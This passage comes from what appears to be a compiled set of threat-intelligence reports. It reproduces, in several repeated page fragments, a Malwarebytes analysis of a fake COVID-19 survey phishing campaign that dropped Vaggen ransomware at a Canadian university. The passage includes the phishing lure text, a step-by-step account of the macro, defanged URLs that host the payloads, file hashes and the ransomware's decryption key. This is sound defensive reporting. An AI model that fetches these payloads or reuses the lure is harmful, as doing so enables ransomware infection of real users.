phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2126 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2127 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2128 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2129 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2130 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2131 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2132 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2133 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2134 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2135 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2136 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2137 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2138 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2139 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2140 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2141 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2142 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2143 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2144 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2145 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2146 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2147 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2148 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2149 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2150 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2151 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2152 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2153 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2154 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2155 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2156 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2157 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2158 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2159 of 